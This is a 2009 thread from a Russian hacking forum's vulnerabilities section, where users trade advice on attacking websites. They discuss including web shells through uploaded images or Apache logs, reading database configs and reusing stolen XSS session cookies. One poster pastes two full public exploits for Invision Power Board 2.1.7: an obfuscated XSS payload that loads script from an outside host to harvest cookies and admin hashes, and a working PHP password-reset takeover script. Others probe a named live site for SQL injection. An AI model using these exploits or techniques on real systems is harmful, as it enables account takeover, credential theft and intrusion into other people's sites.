Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. joomler

    joomler Member

    Joined:
    19 Feb 2009
    Messages:
    25
    Likes Received:
    5
    Reputations:
    3
    Даа еслиб я знал как написать уязвимый код , я не программер(((

    Может подскажите как сделать sql запрос для добавления нового пользователя в базу?
    или как скрипт уязвимый подписать?

    или литературку ?
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Добавить юзера в БД:
    Code:
    mysql --user=root mysql
    INSERT INTO user VALUES('localhost','monty',PASSWORD('some_pass'),
    'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y');
    mysql> INSERT INTO user VALUES('%','monty',PASSWORD('some_pass'),
    'Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y');
    
    Подробнее здесь: http://www.phpclub.ru/mysql/doc/adding-users.html
     
    #6302 -m0rgan-, 3 Apr 2009
    Last edited: 3 Apr 2009
  3. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    удаленно подключить шелл вроде не выйдет потому что в инклуде у них сначала идет определенный путь а потом уже подставляется параметр

    include(<путь>/<парам>_blabla.php)
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Можно прочитать конфиг коннекта к бд (если она имеется). После чего залогинится с ними для администрирования БД.
     
    1 person likes this.
  5. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Ещё можно попытаться заинклудить шелл - например из картинки(если есть возможность залить) или из логов апача...
     
  6. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    S00pY, можно, но если есть права и полный путь, то лучше воспользоватся функцией into outfile.
     
    #6306 -m0rgan-, 3 Apr 2009
    Last edited: 3 Apr 2009
  7. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    нашел my.cnf

    там указан путь к mysqld.log
    когда попытался его прочитать получил permission denied

    то же самое и с сpanel.config

    там указаны пути к .log файлам но прочесть ни один не смог из-за отсутствия прав
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Нет такой функции :)

    FarIZ
    http://forum.antichat.ru/thread23501.html
    https://forum.antichat.ru/thread22832.html
    http://forum.antichat.ru/showthread.php?t=23394
     
    2 people like this.
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Спасибо, поправил)
     
  10. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Я говорил об php конфиге.
    Он можен находится не как отдельный файл, а быть вписаным скажем в index.php и т.д.
     
  11. mozarat

    mozarat New Member

    Joined:
    10 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Для того что бы заюзать удаленый инклуд, необходимо указывать только на шелл в расширении .txt?
    И второй вопрос:
    Есть пасивная xss. Куки приходят. После подмены меня просто выкидует из аккаунта.
    Бывает такое что просто надо не все поля заменять? Или тут ничего не сделаешь?
     
  12. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Зависит от конкретной ситуации! Однозначно не скажешь...
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нет, ссылку указывают тхт, чтобы кто-то не открыл сам шелл. DrAssault тоже прав...
    Если идёт привязка по ипу - ничего не сделаешь.
     
    #6313 mailbrush, 4 Apr 2009
    Last edited: 4 Apr 2009
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    )))
    инклудят в большинстве случаев именно тхт(можно инклудить хоть мп3), потому что файл с расширением php интерпретируется на удаленном сервере(в большинстве случаев, если не стоит php_flag engine off), а не потому что "кто-то" может открыть шелл.
     
    1 person likes this.
  15. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Так же не стоит забывать что куки временные файлы, возможно что срок действия куков вышел... Какого сервиса куки то?
    ЗЫ Iceangel_ прав...
     
    #6315 DrAssault, 4 Apr 2009
    Last edited: 4 Apr 2009
  16. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    а, сорри.

    когда подключаю индекс то он выполняется т.е. вижу готовую страницу а содержимое index.php прочитать опять же не могу
     
  17. Сергей Анатольевич

    Joined:
    29 Mar 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    На IPB 2.1.7 есть еще рабочие уязвимости ? Я имею ввиду паблик. Спасибо
     
  18. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Есть
    Code:
    ----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
    
    						INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
    							Eugene Minaev [email protected]
    				___________________________________________________________________
    			____/  __ __ _______________________ _______  _______________    \  \   \
    			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
    			/ /     /_//              /\        /       /      /         /     /___/
    			\/        /              / /       /       /\     /         /         /
    			/        /               \/       /       / /    /         /__       //\
    			\       /    ____________/       /        \/    __________// /__    // /   
    			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
    			\ \\                                                               // // /
    			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
    			. \_\\________[________________________________________]_________//_//_/ . .
    		 
    		----[ NITRO ... ]
    		
    		This vulnerability was already found before, but there was no available 
    		public "figting" exploit for it. This POC consists of several parts - active xss generator, 
    		JS-file, which will be caused at visiting page with xss, log viewer and special component,
    		which will take necessary data from MySQL forum's tables in case if intercepted session
    		belonged to the person with moderator privileges. 
    		
    		----[ ANALYSIS ... ]
    		
    		XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for 
    		future injetion on the forum board. As the reference it is necessary to specify the full way 
    		up to ya.js file (in which you have already preliminary corrected way on your own). Most likely 
    		it is necessary only to press the button. 
    		
    		[img]http://www.ya.ru/[snapback]	onerror=script=document.createElement(String.fromCharCode(115,99,114,
    		105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
    		head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
    		style=visibility:hidden	=[/snapback].gif[/img]
    		
    		The injection can be executed only when there is available session of the user with access 
    		in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" 
    		function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
    		
    		index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
    		
    		----[ RECORD ... ]
    		{
    		
    			---IP ADDRESS	sniffed ip address
    			---REFERER		xssed theme
    			---COOKIES 		xssed cookies of forum member
    			---USER ID		xssed user id of forum member
    			---ADMIN NAME	admin username
    			---ADMIN PASS	admin pass hash
    			---ADMIN SALT	admin hash salt
    			
    		}
    		
    		----[ PATCH ... ]
    		
    		FILE 
    			sources/classes/bbcode/class_bbcode_core.php
    		FUNCTION
    			regex_check_image
    		LINE
    			924
    		REPLACE
    			if ( preg_match( "/[?&;]/", $url) )
    		ON
    			if ( preg_match( "/[?&;\<\[]/", $url) ) 
    			
    			
    		FILE
    			sources/classes/bbcode/class_bbcode_core.php
    		FUNCTION
    			post_db_parse_bbcode
    		LINE
    			486
    		REPLACE
    			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
    		ON
    			preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
    
    			if ( $row['bbcode_tag'] == 'snapback' )
    			{	
    				$match[2][$i] = intval( $match[2][$i] );
    			}  
    			
    			
    		
    		www.underwater.itdefence.ru/isniff.rar
    		www.milw0rm.com/sploits/2008-isniff.rar
    
    ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
    
    # milw0rm.com [2008-01-05]
    

    Code:
    <?php
    /*
    
     Debug Mode password change vulnerability
     Affects Invision Power Borard 2.0.0 to 2.1.7
     by Rapigator
     
     This works if:
    
     "Debug Level" is set to 3
     or
     Enable SQL Debug Mode is turned on
     
     In General Configuration of the forum software.
    
    */
    
    // The forum's address up to and including 'index.php'
    $site = "http://localhost/forums/index.php";
    
    // An existing user's login name
    $name = "admin";
    
    // The new password(3-32 characters)
    $pass = "1234";
    
    // You can use a proxy...
    // $proxy = "1.2.3.4:8080";
    
    
    
    // -----------------------------
    $site .= "?";
    $suffix = "";
    $name = urlencode($name);
    $pass = urlencode($pass);
    $curl = curl_init($site.'act=Reg&CODE=10');
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
    	$prefix = $regs[1];
    	$regid = $regs[2];
    	$regcode = $regs[3];
    } else {
    	$suffix = "&debug=1";
    	$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
    	curl_setopt($curl, CURLOPT_PROXY, $proxy);
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    	$page = curl_exec($curl);
    	curl_close($curl);
    	if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
    		$prefix = $regs[1];
    		$regid = $regs[2];
    		$regcode = $regs[3];
    	}
    }
    if (!isset($regid) || !isset($regcode)) {
    	echo "Error: Probably not vulnerable, or no forum found";
    	exit;
    }
    
    $curl = curl_init($site.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    	change_pass($regcode,$regid,$regs[1],$regs[2]);
    }
    if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    	change_pass($regcode,$regid,$regs[1],$regs[2]);
    }
    
    function change_pass($regcode,$regid,$vid,$userid) {
    	global $site, $proxy, $name, $pass;
    	$curl = curl_init($site.$suffix);
    	curl_setopt($curl, CURLOPT_PROXY, $proxy);
    	curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    	curl_setopt($curl, CURLOPT_POST, 1);
    	curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    	curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    	$page = curl_exec($curl);
    	curl_close($curl);
    	echo "Password Changed!";
    	exit;
    }
    ?>
    
    # milw0rm.com [2006-11-01]
    
    А если ты на щёт патченых форумов - то врятли!
     
    #6318 -m0rgan-, 4 Apr 2009
    Last edited: 4 Apr 2009
  19. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://www.la2onix.ru/?act=news&page='

    Тут не похек?
     
  20. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Точно не скажу, ибо после второго запроса мой ip заблочили =///
    Но вроде как нет...
    http://www.la2onix.ru/?act=news&page=
    Здесь раскрытие путей...
     
Thread Status:
Not open for further replies.